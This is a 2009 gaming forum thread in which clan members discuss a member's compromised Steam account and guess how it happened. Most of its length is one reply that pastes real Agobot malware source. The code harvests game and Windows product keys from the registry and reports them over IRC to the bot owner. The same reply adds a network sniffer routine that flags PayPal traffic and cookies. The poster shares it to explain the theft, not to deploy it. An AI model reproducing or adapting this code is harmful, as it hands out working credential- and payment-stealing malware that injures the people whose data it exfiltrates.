Dot's account is comprimised

**DoT** · 09-19-2009, 10:15 PM

just came back from a good day out and find out my accnt is hacked -__-
hitting up valve in a sec.
smoke break to relieve the shock first.

its weird though...i didnt click a link NOR type my info anywhere. i got a message from silence but just closed it and told you guys here.

-_-

fuck you need purchase info :/ this will take longer than i thought.
would prolly be safest to take me off steam friends if you havent done so already

**Natalya** · 09-19-2009, 10:43 PM

How did someone hack him without phishing?

**Guitar Guy** · 09-19-2009, 11:56 PM

Originally posted by NatalyaAF

How did someone hack him without phishing?

Exactly, thats what I was wondering.
1 of three ways Dot's password was stolen.

1, would be brute force (HIGHLY UNLIKELY unless his password is 123)
2, would be keylogger.
3, would be phishing

But keyloggers dont just appear from a message. Trust me, Ive made keyloggers before. They dont just appear from no where. Some code has to be executed for a keylogger to get on your computer, and a message doesnt cut it. Dot didnt enter any info, so phising is out of the question. Brute force would take a couple thousand years, So wtf?

**warlord4650** · 09-20-2009, 01:10 AM

cunts aren't touching my account..

**<JohnnyBoy>** · 09-20-2009, 01:24 AM

I'm guessing the hacker is really pro and know what he's doing so anyone of us could be next! =D Be on your guards people and don't click on *ANY* websites that says FREE STEAM GAMES ever!

**Natalya** · 09-20-2009, 02:19 AM

If you make a 50 digit password, brute force would not be able to solve it in ten times the age of the universe even if all the matter in the universe was used to build a giant computer specifically for the purpose of cracking it.

**ORGANDONOR** · 09-20-2009, 06:30 AM

i got my 4 dig hacked like a year ago by just adding someone to me steam friends i dont know how they did it though i was pissed as hell

**siosios** · 09-20-2009, 07:33 AM

some homemade viruses have built in key loggers and search the registry for game keys. if they find bank info or a game key they report it via irc to the owner of the virus.

example virus's that do this are the old and outdated agobot or the sdbot so on so forth.

here is the ago bots game key search code:

Code:

[B][SIZE=2]#include "main.h"
#include "mainctrl.h"
#include "harvest_cdkeys.h"
#ifdef WIN32
struct items
{
char *GameName;
HKEY RootKey;
char *SubKey;
char *ValueName;
};
#define MAX_KEY_LENGTH 2048
#define MAX_VALUE_NAME 16383
/* Leet cdkey code by thegeek:)
* CDKey List, With GameNames and Registry Entries £
* Here Is Where You Would Add New Games If You Wanted Too
* TODO: add support for getting from files.
*/
items CDKeyList[] =
{
{ "[Windows Product ID: ", HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion", "ProductID" },
{ "[Battlefield 1942: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942\\ergc", "" },
{ "[Battlefield 1942: Secret Weapons Of WWII: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942 Secret Weapons of WWII\\ergc", "" },
{ "[Battlefield 1942: The Road To Rome: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield 1942 The Road to Rome\\ergc", "" },
{ "[Battlefield 1942: Vietnam:", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Battlefield Vietnam\\ergc", "" },
{ "[Black and White: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Black and White\\ergc", "" },
{ "[Command and Conquer: Generals: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Generals\\ergc", "" },
{ "[Command and Conquer: Generals: Zero Hour: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Command and Conquer Generals Zero Hour\\ergc", "" },
{ "[Command and Conquer: Red Alert2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Westwood\\Red Alert 2", "Serial" },
{ "[Command and Conquer: Tiberian Sun: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Westwood\\Tiberian Sun", "Serial" },
{ "[Counter-Strike: ", HKEY_CURRENT_USER, "Software\\Valve\\CounterStrike\\Settings", "Key" },
{ "[FIFA 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\FIFA 2002\\ergc", "" },
{ "[FIFA 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\FIFA 2003\\ergc", "" },
{ "[Freedom Force: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Distribution\\Freedom Force\\ergc", "" },
{ "[Global Operations: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Global Operations\\ergc", "" },
{ "[Gunman Chronicles: ", HKEY_CURRENT_USER, "Software\\Valve\\Gunman\\Settings", "Key" },
{ "[Half-Life: ", HKEY_CURRENT_USER, "Software\\Valve\\Half-Life\\Settings", "Key" },
{ "[Hidden and Dangerous 2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Illusion Softworks\\Hidden & Dangerous 2", "key" },
{ "[IGI2: Covert Strike: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\IGI 2 Retail\\CDKey", "CDkey" },
{ "[Industry Giant 2: ", HKEY_CURRENT_USER, "Software\\JoWooD\\InstalledGames\\IG2", "prvkey" },
{ "[James Bond 007: Nightfire: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\James Bond 007 Nightfire\\ergc", "" },
{ "[Medal of Honor: Allied Assault: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault\\ergc", "" },
{ "[Medal of Honor: Allied Assault: Breakthrough ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault Breakthrough\\ergc", "" },
{ "[Medal of Honor: Allied Assault: Spearhead ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Medal of Honor Allied Assault Spearhead\\ergc", "" },
{ "[Nascar Racing 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\Nascar Racing 2002\\ergc", "" },
{ "[Nascar Racing 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\Nascar Racing 2003\\ergc", "" },
{ "[NHL 2002: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\NHL 2002\\ergc", "" },
{ "[NHL 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA Sports\\NHL 2003\\ergc", "" },
{ "[Need For Speed: Hot Pursuit 2: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Need For Speed Hot Pursuit 2\\ergc", "" },
{ "[Need For Speed: Underground: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Need For Speed Underground\\ergc", "" },
{ "[Neverwinter Nights: ", HKEY_LOCAL_MACHINE, "Software\\BioWare\\NWN\\Neverwinter","Key" },
{ "[Ravenshield: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Red Storm Entertainment\\RAVENSHIELD", ""},
{ "[Shogun: Total War: Warlord Edition: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Electronic Arts\\EA GAMES\\Shogun Total War - Warlord Edition\\ergc", "" },
{ "[Soldiers Of Anarchy: ", HKEY_CURRENT_USER, "Software\\Silver Style Entertainment\\Soldiers Of Anarchy\\Settings", "CDKey" },
{ "[Soldier Of Fortune 2: ",HKEY_LOCAL_MACHINE, "Software\\Activision\\Soldier of Fortune II - Double Helix", "sof2key" },
{ "[The Gladiators: ", HKEY_CURRENT_USER, "Software\\Eugen Systems\\The Gladiators", "RegNumber" },
{ "[Unreal Tournament 2003: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Unreal Technology\\Installed Apps\\UT2003", "CDKey" },
{ "[Unreal Tournament 2004: ", HKEY_LOCAL_MACHINE, "SOFTWARE\\Unreal Technology\\Installed Apps\\UT2004", "CDKey" },

};
#endif // WIN32
char szKey[1024];
char *szLogText;
/*
=======================================================================================================================
=======================================================================================================================
*/
void CHarvest_CDKeys::Init(void)
{
REGCMD(m_cmdCDKeys, "harvest.cdkeys", "makes the bot get a list of cdkeys", false, this);
}
/*
=======================================================================================================================
=======================================================================================================================
*/
bool CHarvest_CDKeys::HandleCommand(CMessage *pMsg)
{
#ifdef WIN32
if(!pMsg->sCmd.Compare("harvest.cdkeys"))
{
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
#define arraysize(x) (sizeof(x) / sizeof(x[0]))
DWORD dwSize = 2048;
unsigned char szBuffer[2048];
int i=0;
char *UserKey = (char *) malloc(128);
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
szLogText = new char[2048];
memset(szLogText, 0, 2048);
if (!g_pMainCtrl->m_cBot.cdkey_windows.bValue){
i=1;}
for(i;i < arraysize(CDKeyList); i++)
{
 
if(CDKeyList[i].RootKey != HKEY_CURRENT_USER)
{
/*~~~~~~~~~~~~~~*/
HKEY rk = NULL;
/*~~~~~~~~~~~~~~*/
sprintf(UserKey, "%s", CDKeyList[i].SubKey);
memset(szBuffer, 0, sizeof(szBuffer));
memset(szKey, 0, sizeof(szKey));
memset(szLogText, 0, sizeof(szLogText));
if(RegOpenKeyEx(CDKeyList[i].RootKey, UserKey, 0, KEY_READ, &rk) != ERROR_SUCCESS)
{
}
if(RegQueryValueEx(rk, CDKeyList[i].ValueName, NULL, NULL, szBuffer, &dwSize) != ERROR_SUCCESS)
{
}
if(RegQueryValueEx(rk, CDKeyList[i].ValueName, NULL, NULL, szBuffer, &dwSize) == ERROR_SUCCESS)
{
g_pMainCtrl->m_cIRC.SendFormat
(
pMsg->bSilent,
pMsg->bNotice,
pMsg->sReplyTo.Str(),
"%s%s]\n",
CDKeyList[i].GameName,
szBuffer
);
}
RegCloseKey(rk);
/*
* strcat(szLogText, rKeyString); £
* ReadKey(szKey, CDKeyList[i].GameName, CDKeyList[i].RootKey,CDKeyList[i].SubKey,
* CDKeyList[i].ValueName, dwSize, szBuffer);
* g_cMainCtrl.m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice,
* pMsg->sReplyTo.Str(), szKey);
*/
}
if(CDKeyList[i].RootKey == HKEY_CURRENT_USER)
{
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
CHAR achKey[2048]; /* buffer for subkey name */
DWORD cbName; /* size of name string */
CHAR achClass[MAX_PATH] = ""; /* buffer for class name */
DWORD cchClassName = MAX_PATH; /* size of class string */
DWORD cSubKeys = 0; /* number of subkeys */
DWORD cbMaxSubKey; /* longest subkey size */
DWORD cchMaxClass; /* longest class string */
DWORD cValues; /* number of values for key */
DWORD cchMaxValue; /* longest value name */
DWORD cbMaxValueData; /* longest value data */
DWORD cbSecurityDescriptor; /* size of security descriptor */
FILETIME ftLastWriteTime; /* last write time */
DWORD retCode;
int u;
CHAR achValue[MAX_VALUE_NAME];
DWORD cchValue = MAX_VALUE_NAME;
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/*
* g_cMainCtrl.m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice,
* pMsg->sReplyTo.Str(), CDKeyList[i].GameName); £
* Get the class name and the value count.
*/
retCode = RegQueryInfoKey
(
CDKeyList[i].RootKey, /* key handle */
achClass, /* buffer for class name */
&cchClassName, /* size of class string */
NULL, /* reserved */
&cSubKeys, /* number of subkeys */
&cbMaxSubKey, /* longest subkey size */
&cchMaxClass, /* longest class string */
&cValues, /* number of values for this key */
&cchMaxValue, /* longest value name */
&cbMaxValueData, /* longest value data */
&cbSecurityDescriptor, /* security descriptor */
&ftLastWriteTime /* last write time */
);
/* Enumerate the subkeys, until RegEnumKeyEx fails. */
if(cSubKeys)
{
for(u = 0; u < cSubKeys; u++)
{
cbName = MAX_KEY_LENGTH;
retCode = RegEnumKeyEx(HKEY_USERS, u, achKey, &cbName, NULL, NULL, NULL, &ftLastWriteTime);
if(retCode == ERROR_SUCCESS)
{
/*~~~~~~~~~~~~~~*/
HKEY rk = NULL;
/*~~~~~~~~~~~~~~*/
sprintf(UserKey, "%s\\%s", achKey, CDKeyList[i].SubKey);
memset(szBuffer, 0, sizeof(szBuffer));
memset(szKey, 0, sizeof(szKey));
if(RegOpenKeyEx(HKEY_USERS, UserKey, 0, KEY_READ, &rk) != ERROR_SUCCESS)
{
}
if
(
RegQueryValueEx
(
rk,
CDKeyList[i].ValueName,
NULL,
NULL,
szBuffer,
&dwSize
) != ERROR_SUCCESS
)
{
RegCloseKey(rk);
}
if
(
RegQueryValueEx
(
rk,
CDKeyList[i].ValueName,
NULL,
NULL,
szBuffer,
&dwSize
) == ERROR_SUCCESS
)
{
g_pMainCtrl->m_cIRC.SendFormat
(
pMsg->bSilent,
pMsg->bNotice,
pMsg->sReplyTo.Str(),
"%s%s]\n",
CDKeyList[i].GameName,
szBuffer
);
}
RegCloseKey(rk);
}
}
}
}
}
 

HKEY hkey=NULL; unsigned char szDataBuf[128]; unsigned char szDataBuf2[1024]; char line[100];
dwSize = 128; LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Activision\\Soldier of Fortune II - Double Helix", 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, "InstallPath", NULL, NULL, szDataBuf2, &dwSize)== ERROR_SUCCESS)
{ char *szPath = (char*)malloc(MAX_PATH); FILE *fp;
sprintf(szPath, "%s\\base\\mp\\%s", szDataBuf2, "sof2key");
if((fp=fopen(szPath,"r"))!=NULL)
{ if(fgets(line, 100, fp))
if(!strstr(line, "mtkwftmkemfew3p3b7"))
{ g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found SOF2 CDKey (%s).", line); }
fclose(fp); }
if(szPath) free(szPath); }
RegCloseKey(hkey);
/*
Call of Duty
*/
// Warezed: TSH3XSWTYPWGUUTXE660
dwSize = 128; lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Activision\\Call of Duty", 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, "InstallPath", NULL, NULL, szDataBuf2, &dwSize)== ERROR_SUCCESS)
{ char *szPath = (char*)malloc(MAX_PATH); FILE *fp;
sprintf(szPath, "%s\\main\\%s", szDataBuf2, "codkey");
if((fp=fopen(szPath,"r"))!=NULL)
{ if(fgets(line, 100, fp))
if(!strstr(line, "TSH3XSWTYPWGUUTXE660"))
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found COD CDKey (%s).", line);
fclose(fp); }
if(szPath) free(szPath); }
RegCloseKey(hkey);
 
 
 
return true;
}
#endif // WIN32
return false;
}
[/SIZE][/B][SIZE=2][/SIZE]

One part of the sniffer code (this one looks for paypal):

Code:

[B][SIZE=2]
// Like paypals? ;-D How about cookies? YUMMEH! -rain
bool IsSuspiciousHTTP(const char *szBuf) {
if(strstr(szBuf, "HTTP sniff")) return false;
if(strstr(szBuf, g_pMainCtrl->m_sUserName.CStr())) return false;
if(strstr(szBuf, g_pMainCtrl->m_cBot.si_mainchan.sValue.CStr())) return false;
if(strstr(szBuf, "paypal")) return true;
if(strstr(szBuf, "PAYPAL")) return true;
if(strstr(szBuf, "PAYPAL.COM")) return true;
if(strstr(szBuf, "paypal.com")) return true;
if(strstr(szBuf, "Set-Cookie:")) return true;
return false; }
[/SIZE][/B][SIZE=2][/SIZE]

im sure the newer trojans out there are more advanced but this is how they can get your info also.

**dvxAznSensationxvb** · 09-20-2009, 08:09 AM

so VAC ban is for individual servers right? if so then ban me from all NU and NI servers that way i cant get VAC banned from those servers at least..................until i get stuff in order

**Jackd** · 09-20-2009, 08:20 AM

Whats your steam ID?

Originally posted by dvxAznSensationxvb

so VAC ban is for individual servers right? if so then ban me from all NU and NI servers that way i cant get VAC banned from those servers at least..................until i get stuff in order

**dvxAznSensationxvb** · 09-20-2009, 01:45 PM

Steam_0:1:3496656
---------------------------------------------------------------------------------------------------------------------
hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?

**DoT** · 09-20-2009, 01:48 PM

Originally posted by dvxAznSensationxvb

Steam_0:1:3496656
---------------------------------------------------------------------------------------------------------------------
hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?

yupp
and he deleted our whole friends list.
but he hasnt changed my accnt info which has n/us site and group info on it so be careful guys

**Jackd** · 09-20-2009, 01:59 PM

Steam ID is invalid.

Originally posted by dvxAznSensationxvb

Steam_0:1:3496656
---------------------------------------------------------------------------------------------------------------------
hmmm i wonder if this hacker is a reseller.................... since the status of my original acct seems to be totally erased?

**DoT** · 09-20-2009, 02:16 PM

Sent my shit in to valve, hopefully this turns back soon.

**dvxAznSensationxvb** · 09-20-2009, 02:40 PM

This is awful..... I'm here and oneforty is outranking me as we speak!!!!! Dam and everyone is probably worried sick like drank and aim and sky and nat and Nadia and especially army :-/

Dot's account is comprimised

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment